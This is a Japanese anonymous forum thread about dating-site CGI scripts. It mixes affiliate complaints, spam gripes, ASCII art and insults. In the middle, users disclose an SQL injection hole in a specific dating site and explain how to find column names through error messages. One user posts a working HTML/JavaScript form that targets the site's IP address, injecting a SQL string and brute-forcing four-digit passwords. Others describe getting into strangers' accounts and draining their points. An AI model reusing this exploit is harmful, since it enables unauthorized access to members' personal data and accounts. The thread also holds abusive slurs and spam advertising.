出会い系サイトのcgiスクリプト
出会い系サイトで使われてる
cgiのスクリプトって
配付されてるんですか? http://www.edeai.jp/
でアフィエイトやってたら、
ハードディスクの故障で全データ破損だと。
久しぶりにサイトに行ったら書いてあったよ。
こんなトラブルで何で通知しないの?
っていうか、報酬は?
これからはしっかりとバックアップをとるんだとさ。
こういう感じのところみたいだよ。 出会い系システムを鯖・回線ひっくるめて1000万で提供してるって
テレビでやってたな。どこか忘れたが1年前くらい。
供給過剰で新規参入は厳しいとは思うが、迷惑メールだけは止めれ。 そうだな、まじうぜえよ
メール。i-modeにおくるな なんか・・いぱ〜いあたよ
ttp://www.icocomo.com/cgi_link/index.html 管理人が痛くて痛くて仕方ないサイト。もう見てらんない。
引き篭もりのゴミ屑。どこかのパク理。師ね。
宣伝板を自分のものにしてるアホ。
http://mailcross.tripod.co.jp/
∧_∧
ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎――◎ 山崎渉
__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄ ∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ tp://www.edeai.jp/
↑の社長はめちゃくちゃ若いぞ〜
まだ、二十代。
ついでに言うと外車乗り回して贅沢な生活もしてるぞ〜
今はスタッフがアメリカに渡って色々やってるらしぃ 1から約2年も続いてるのに40か.
ちなみに無料で配布しているところ知ってるが教えてやんない 某出会い系?サイトのPHPスクリプトで、
登録男性会員のプロフィール、メアド等を閲覧、
およびその会員のポイントを使用して掲示板閲覧、書き込み等が
できてしまうセキュリティホールを発見してしまったんだがどうする? URL記述のクエリの中に、SQL文を書いてやることで、任意のSQL文を実行させることができるっぽい。
ヒントは、
"SELECT id, nickname,password,state FROM user_login_m WHERE telephone = '" . $tel . "'" >>44
携帯以外は弾かれるんじゃ・・
useragent偽装してもダメっしょ。。 >>51
女性会員の方にいきましたな?
気持ちはよくわかります。
なぜか女性会員の方はPCからだと認証かかっていて、imodeからの直URLでも、メアドとかはみれませんでした。
なぜか男性会員の方だけできる。 無料じゃなくていいからcgiって誰か売ってないか?
誰でも作れるようなのじゃなくね。 <head>
<script>
str = "' or telephone != '' and password='";
function ttt(){
intNum = parseInt(document.ccc.con.value) + 1;
document.ccc.con.value = intNum;
strNum = intNum.toString(10);
while (strNum.length < 4){
strNum = "0" + strNum;
}
document.ff.tel.value = str + strNum;
document.ff.pass.value = strNum;
document.ff.submit();
}
</script>
</head>
<body>
<form action="http://210.157.14.41/m/index.php" method="get" target=betru" name="ff">
<input type=hidden name="a" value="menu">
<input type=hidden name="log" value="1">
<input type=hidden name="mid" value="">
<input name="tel" value="' or telephone != '' and password='" size=100 istyle="4"><br>
<input name="pass" value="0000" size=10 maxlength=4 istyle="4" MODE=numeric><br>
<input type=submit value="ログイン"><br>
</form><form name=ccc>
<input name=con type=text value="0" size=6>
<input type=button value="++Submit" onClick="ttt();">
</form></body></html> 簡易的にパスワードの0001〜9999まで確かめれるHTMLを作成したのでご自由に。 >>42
なんでカラム名がわかったんだ?単純だから適当に?
すげえな。 >>61
passwordというカラム名はあてずっぽ一発正解です。
ほかの列挙は、SQL文がエラーとなるように text にいれてやれば、
こういうSQL文でエラーがでましたよ。と、わざわざHTMLでしらせてくれる。 無料じゃなくていいから誰か出会い系のソース売ってくれる方いませんか? >>64
予算と納期と仕様書のでき次第だな
あ〜んど、引渡し後無保証
どこぞのに予算出すくらいなら、飲み屋でドンペリ入れたほうがずっとマシ。
ふざけんな。
>>55
今日見たとき、180ポイントくらいあったのに…
もう9しかないし…www このまま不正アクセスで祭りにされなきゃいいが。。
2ちゃんで過去に何度となくあったぞ・・
仮にこんなもんで何かあったらたまんねぇぞ(w
まずありえないが IEのアドレスバーにキーボードの通常入力から普通に文字を入力してエンターで
行けるURLに不正だとか言われたらたまんないねw カ シ ワ モ ー チ
______
`=、;;;;;,,,,,,,:::,,,,,;;;;;,,,,`""''';;;;,, 、__
,.-'゙''''',='";;;;;;;;",-,,;;;;;;゙;;;;;;;;;l;;;;`,、
/ `ー-...,;;;;;;;;;;;;,-‐/;;;;;;';;;;;;;;;;;;
./ `''''''""i;;;;;;;;ヽ
l ■ |,,,____/ |;;;;
| |.:::::/ ■ ノ;;;;
ヽ、 |:::/ _,/;;;'゛
`ヽ、_ |/ _,,.,;‐';;;;゛゛
"'''=ー;‐---‐‐'';';"-''"゛ 昔101って発毛剤があったね
俺もそろそろやばいかな… 乗り遅れた...
ポイントいじれたってホント?
乗れてたら一兆ぐらいにしたんだけど... >>55のリンクをクリックしただけでも
不正アクセスになっちゃうのかな?
0026の部分を適当な四桁の数字に変更してやると、いろいろな人のにはいれるっぽい。 >>109
業務が業務なだけに警察にも協力しにくいとかあるのか? どうでもいいが、サイト広告のメール、未承諾広告ってちゃんと入れてクレヨ。
入れないと罰金とられるよ。
個人っぽくメールしてサイト広告してるのもだゾ。
あんまり多く来るから、全部取っといて、後で密告だ! 落ちてるソースは古いのばっか
新しいソースはないものか・・
★□□□□■〓〓==! タダなのに、改良版にVerアップ !==〓〓■□□□□★
「うちでのこづち」には、お世話になりました…
一時の勢いは無くなったものの、まだ稼ぎを出してるみたいですね(^^
しかし、私はもっと素晴らしい仕事を見つけました。
という訳で、感謝の意味を込めて、「こづち改良版」無料配布中です↓
ご要望に応えて「改良版」にVerアップしました。いぜん、タダです…
http://otokunews.nce.buttobi.net
トップページをよく見てください。それでは、失礼します。m(_ _)m